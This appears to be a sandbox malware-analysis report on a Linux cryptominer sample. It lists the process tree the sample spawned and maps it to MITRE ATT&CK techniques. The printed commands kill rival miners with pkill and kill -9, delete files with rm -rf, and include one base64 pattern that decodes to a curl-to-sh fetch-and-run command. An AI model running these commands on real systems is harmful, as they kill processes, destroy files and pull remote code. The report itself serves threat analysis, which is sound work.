PID:1144

/usr/bin/pgrep
pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
2⤵
PID:1143

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1146

/usr/bin/pgrep
pgrep -f mwyumwdbpq.conf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1145

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1148

/usr/bin/pgrep
pgrep -f honvbsasbf.conf
2⤵
- Reads CPU attributes
PID:1147

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1150

/usr/bin/pgrep
pgrep -f mqdsflm.cf
2⤵
PID:1149

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1152

/usr/bin/pgrep
pgrep -f lower.sh
2⤵
- Reads CPU attributes
PID:1151

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1154

/usr/bin/pgrep
pgrep -f ./ppp
2⤵
PID:1153

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1156

/usr/bin/pgrep
pgrep -f cryptonight
2⤵
PID:1155

/usr/bin/pgrep
pgrep -f ./seervceaess
2⤵
- Reads CPU attributes
PID:1157

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1158

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1160

/usr/bin/pgrep
pgrep -f ./servceaess
2⤵
PID:1159

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1162

/usr/bin/pgrep
pgrep -f ./servceas
2⤵
- Reads CPU attributes
PID:1161

/usr/bin/pgrep
pgrep -f ./servcesa
2⤵
- Reads CPU attributes
PID:1163

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1164

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1166

/usr/bin/pgrep
pgrep -f ./vsp
2⤵
PID:1165

/usr/bin/pgrep
pgrep -f ./jvs
2⤵
PID:1167

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1168

/usr/bin/pgrep
pgrep -f ./pvv
2⤵
PID:1169

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1170

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1172

/usr/bin/pgrep
pgrep -f ./vpp
2⤵
PID:1171

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1174

/usr/bin/pgrep
pgrep -f ./pces
2⤵
PID:1173

/usr/bin/pgrep
pgrep -f ./rspce
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1175

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1176

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1178

/usr/bin/pgrep
pgrep -f ./haveged
2⤵
PID:1177

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1180

/usr/bin/pgrep
pgrep -f ./jiba
2⤵
PID:1179

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1182

/usr/bin/pgrep
pgrep -f ./watchbog
2⤵
PID:1181

/usr/bin/pgrep
pgrep -f ./A7mA5gb
2⤵
- Reads runtime system information
PID:1183

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1184

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1186

/usr/bin/pgrep
pgrep -f kacpi_svc
2⤵
- Reads CPU attributes
PID:1185

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1188

/usr/bin/pgrep
pgrep -f kswap_svc
2⤵
PID:1187

/usr/bin/pgrep
pgrep -f kauditd_svc
2⤵
PID:1189

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1190

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1192

/usr/bin/pgrep
pgrep -f kpsmoused_svc
2⤵
PID:1191

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1194

/usr/bin/pgrep
pgrep -f kseriod_svc
2⤵
PID:1193

/usr/bin/pgrep
pgrep -f kthreadd_svc
2⤵
- Reads CPU attributes
PID:1195

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1196

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1198

/usr/bin/pgrep
pgrep -f ksoftirqd_svc
2⤵
PID:1197

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1200

/usr/bin/pgrep
pgrep -f kintegrityd_svc
2⤵
PID:1199

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1202

/usr/bin/pgrep
pgrep -f jawa
2⤵
PID:1201

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1204

/usr/bin/pgrep
pgrep -f oracle.jpg
2⤵
- Reads runtime system information
PID:1203

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1206

/usr/bin/pgrep
pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
2⤵
- Reads runtime system information
PID:1205

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1208

/usr/bin/pgrep
pgrep -f 188.209.49.54
2⤵
- Reads CPU attributes
PID:1207

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1210

/usr/bin/pgrep
pgrep -f 181.214.87.241
2⤵
- Reads CPU attributes
PID:1209

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1212

/usr/bin/pgrep
pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
2⤵
PID:1211

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1214

/usr/bin/pgrep
pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
2⤵
PID:1213

/usr/bin/pgrep
pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
2⤵
PID:1215

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1216

/usr/bin/pgrep
pgrep -f servim
2⤵
- Reads CPU attributes
PID:1217

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1218

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1220

/usr/bin/pgrep
pgrep -f kblockd_svc
2⤵
PID:1219

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1222

/usr/bin/pgrep
pgrep -f native_svc
2⤵
- Reads CPU attributes
PID:1221

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1224

/usr/bin/pgrep
pgrep -f ynn
2⤵
PID:1223

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1226

/usr/bin/pgrep
pgrep -f 65ccEJ7
2⤵
- Reads CPU attributes
PID:1225

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1228

/usr/bin/pgrep
pgrep -f jmxx
2⤵
- Reads runtime system information
PID:1227

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1230

/usr/bin/pgrep
pgrep -f 2Ne80nA
2⤵
PID:1229

/usr/bin/pgrep
pgrep -f sysstats
2⤵
- Reads CPU attributes
PID:1231

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1232

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1234

/usr/bin/pgrep
pgrep -f systemxlv
2⤵
- Reads CPU attributes
PID:1233

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1236

/usr/bin/pgrep
pgrep -f watchbog
2⤵
PID:1235

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1238

/usr/bin/pgrep
pgrep -f OIcJi1m
2⤵
PID:1237

/usr/bin/pkill
pkill -f biosetjenkins
2⤵
- Reads CPU attributes
PID:1239

/usr/bin/pkill
pkill -f Loopback
2⤵
- Reads CPU attributes
PID:1240

/usr/bin/pkill
pkill -f apaceha
2⤵
- Reads runtime system information
PID:1241

/usr/bin/pkill
pkill -f cryptonight
2⤵
PID:1242

/usr/bin/pkill
pkill -f mixnerdx
2⤵
- Reads CPU attributes
PID:1243

/usr/bin/pkill
pkill -f performedl
2⤵
PID:1244

/usr/bin/pkill
pkill -f JnKihGjn
2⤵
PID:1245

/usr/bin/pkill
pkill -f irqba2anc1
2⤵
PID:1246

/usr/bin/pkill
pkill -f irqba5xnc1
2⤵
PID:1247

/usr/bin/pkill
pkill -f irqbnc1
2⤵
PID:1248

/usr/bin/pkill
pkill -f ir29xc1
2⤵
PID:1249

/usr/bin/pkill
pkill -f conns
2⤵
- Reads runtime system information
PID:1250

/usr/bin/pkill
pkill -f irqbalance
2⤵
PID:1251

/usr/bin/pkill
pkill -f crypto-pool
2⤵
- Reads runtime system information
PID:1252

/usr/bin/pkill
pkill -f XJnRj
2⤵
PID:1253

/usr/bin/pkill
pkill -f mgwsl
2⤵
- Reads CPU attributes
PID:1254

/usr/bin/pkill
pkill -f pythno
2⤵
PID:1255

/usr/bin/pkill
pkill -f jweri
2⤵
PID:1256

/usr/bin/pkill
pkill -f lx26
2⤵
PID:1257

/usr/bin/pkill
pkill -f NXLAi
2⤵
- Reads runtime system information
PID:1258

/usr/bin/pkill
pkill -f BI5zj
2⤵
PID:1259

/usr/bin/pkill
pkill -f askdljlqw
2⤵
PID:1260

/usr/bin/pkill
pkill -f minerd
2⤵
PID:1261

/usr/bin/pkill
pkill -f minergate
2⤵
PID:1262

/usr/bin/pkill
pkill -f Guard.sh
2⤵
PID:1263

/usr/bin/pkill
pkill -f ysaydh
2⤵
PID:1264

/usr/bin/pkill
pkill -f bonns
2⤵
- Reads runtime system information
PID:1267

/usr/bin/pkill
pkill -f donns
2⤵
- Reads runtime system information
PID:1269

/usr/bin/pkill
pkill -f kxjd
2⤵
- Reads CPU attributes
PID:1270

/usr/bin/pkill
pkill -f Duck.sh
2⤵
PID:1272

/usr/bin/pkill
pkill -f bonn.sh
2⤵
- Reads runtime system information
PID:1275

/usr/bin/pkill
pkill -f conn.sh
2⤵
PID:1278

/usr/bin/pkill
pkill -f kworker34
2⤵
- Reads CPU attributes
PID:1280

/usr/bin/pkill
pkill -f kw.sh
2⤵
PID:1284

/usr/bin/pkill
pkill -f pro.sh
2⤵
PID:1287

/usr/bin/pkill
pkill -f polkitd
2⤵
- Reads runtime system information
PID:1290

/usr/bin/pkill
pkill -f acpid
2⤵
PID:1293

/usr/bin/pkill
pkill -f icb5o
2⤵
- Reads runtime system information
PID:1295

/usr/bin/pkill
pkill -f nopxi
2⤵
- Reads CPU attributes
PID:1297

/usr/bin/pkill
pkill -f irqbalanc1
2⤵
PID:1299

/usr/bin/pkill
pkill -f minerd
2⤵
- Reads runtime system information
PID:1300

/usr/bin/pkill
pkill -f i586
2⤵
PID:1302

/usr/bin/pkill
pkill -f gddr
2⤵
PID:1305

/usr/bin/pkill
pkill -f mstxmr
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1306

/usr/bin/pkill
pkill -f ddg.2011
2⤵
PID:1308

/usr/bin/pkill
pkill -f wnTKYg
2⤵
PID:1309

/usr/bin/pkill
pkill -f deamon
2⤵
PID:1310

/usr/bin/pkill
pkill -f disk_genius
2⤵
PID:1311

/usr/bin/pkill
pkill -f sourplum
2⤵
- Reads CPU attributes
PID:1313

/usr/bin/pkill
pkill -f polkitd
2⤵
PID:1314

/usr/bin/pkill
pkill -f nanoWatch
2⤵
PID:1315

/usr/bin/pkill
pkill -f zigw
2⤵
- Reads CPU attributes
PID:1316

/usr/bin/pkill
pkill -f devtool
2⤵
PID:1317

/usr/bin/pkill
pkill -f devtools
2⤵
PID:1318

/usr/bin/pkill
pkill -f systemctI
2⤵
PID:1319

/usr/bin/pkill
pkill -f watchbog
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1320

/usr/bin/pkill
pkill -f cryptonight
2⤵
PID:1321

/usr/bin/pkill
pkill -f sustes
2⤵
PID:1322

/usr/bin/pkill
pkill -f xmrig
2⤵
- Reads runtime system information
PID:1323

/usr/bin/pkill
pkill -f xmrig-cpu
2⤵
- Reads CPU attributes
PID:1324

/usr/bin/pkill
pkill -f 121.42.151.137
2⤵
PID:1325

/usr/bin/pkill
pkill -f init12.cfg
2⤵
- Reads CPU attributes
PID:1326

/usr/bin/pkill
pkill -f nginxk
2⤵
PID:1327

/usr/bin/pkill
pkill -f tmp/wc.conf
2⤵
PID:1328

/usr/bin/pkill
pkill -f xmrig-notls
2⤵
PID:1329

/usr/bin/pkill
pkill -f xmr-stak
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1330

/usr/bin/pkill
pkill -f suppoie
2⤵
- Reads CPU attributes
PID:1331

/usr/bin/pkill
pkill -f zer0day.ru
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1332

/usr/bin/pkill
pkill -f dbus-daemon--system
2⤵
- Reads CPU attributes
PID:1333

/usr/bin/pkill
pkill -f nullcrew
2⤵
PID:1334

/usr/bin/pkill
pkill -f systemctI
2⤵
- Reads CPU attributes
PID:1335

/usr/bin/pkill
pkill -f kworkerds
2⤵
PID:1336

/usr/bin/pkill
pkill -f init10.cfg
2⤵
- Reads CPU attributes
PID:1337

/usr/bin/pkill
pkill -f /wl.conf
2⤵
PID:1338

/usr/bin/pkill
pkill -f crond64
2⤵
PID:1339

/usr/bin/pkill
pkill -f sustse
2⤵
PID:1340

/usr/bin/pkill
pkill -f vmlinuz
2⤵
PID:1341

/usr/bin/pkill
pkill -f exin
2⤵
- Reads runtime system information
PID:1342

/usr/bin/pkill
pkill -f apachiii
2⤵
PID:1343

/usr/bin/pkill
pkill -f svcworkmanager
2⤵
- Reads runtime system information
PID:1344

/usr/bin/pkill
pkill -f xr
2⤵
PID:1345

/bin/rm
rm -rf /usr/bin/config.json
2⤵
- Write file to user bin folder
PID:1346

/bin/rm
rm -rf /usr/bin/exin
2⤵
- Write file to user bin folder
PID:1347

/bin/rm
rm -rf /tmp/wc.conf
2⤵
- Writes file to tmp directory
PID:1348

/bin/rm
rm -rf /tmp/log_rot
2⤵
- Writes file to tmp directory
PID:1349

/bin/rm
rm -rf /tmp/apachiii
2⤵
PID:1350

/bin/rm
rm -rf /tmp/sustse
2⤵
- Writes file to tmp directory
PID:1351

/bin/rm
rm -rf /tmp/php
2⤵
- Writes file to tmp directory
PID:1352

/bin/rm
rm -rf /tmp/p2.conf
2⤵
- Writes file to tmp directory
PID:1353

/bin/rm
rm -rf /tmp/pprt
2⤵
PID:1354

/bin/rm
rm -rf /tmp/ppol
2⤵
- Writes file to tmp directory
PID:1355

/bin/rm
rm -rf /tmp/javax/config.sh
2⤵
PID:1356

/bin/rm
rm -rf /tmp/javax/sshd2
2⤵
PID:1357

/bin/rm
rm -rf /tmp/.profile
2⤵
- Writes file to tmp directory
PID:1359

/bin/rm
rm -rf /tmp/1.so
2⤵
- Writes file to tmp directory
PID:1361

/bin/rm
rm -rf /tmp/kworkerds
2⤵
- Writes file to tmp directory
PID:1362

/bin/rm
rm -rf /tmp/kworkerds3
2⤵
- Writes file to tmp directory
PID:1363

/bin/rm
rm -rf /tmp/kworkerdssx
2⤵
- Writes file to tmp directory
PID:1364

/bin/rm
rm -rf /tmp/xd.json
2⤵
- Writes file to tmp directory
PID:1365

/bin/rm
rm -rf /tmp/syslogd
2⤵
- Writes file to tmp directory
PID:1367

/bin/rm
rm -rf /tmp/syslogdb
2⤵
PID:1368

/bin/rm
rm -rf /tmp/65ccEJ7
2⤵
- Writes file to tmp directory
PID:1370

/bin/rm
rm -rf /tmp/jmxx
2⤵
- Writes file to tmp directory
PID:1371

/bin/rm
rm -rf /tmp/2Ne80nA
2⤵
PID:1372

/bin/rm
rm -rf /tmp/dl
2⤵
- Writes file to tmp directory
PID:1373

/bin/rm
rm -rf /tmp/ddg
2⤵
- Writes file to tmp directory
PID:1374

/bin/rm
rm -rf /tmp/systemxlv
2⤵
PID:1376

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Hijack Execution Flow

Scheduled Task

Privilege Escalation

Hijack Execution Flow

Scheduled Task

Defense Evasion

Hijack Execution Flow

3

T1574

Indicator Removal on Host

1

T1070

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

description	ioc	process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	kill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	kill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pgrep
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	pkill

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads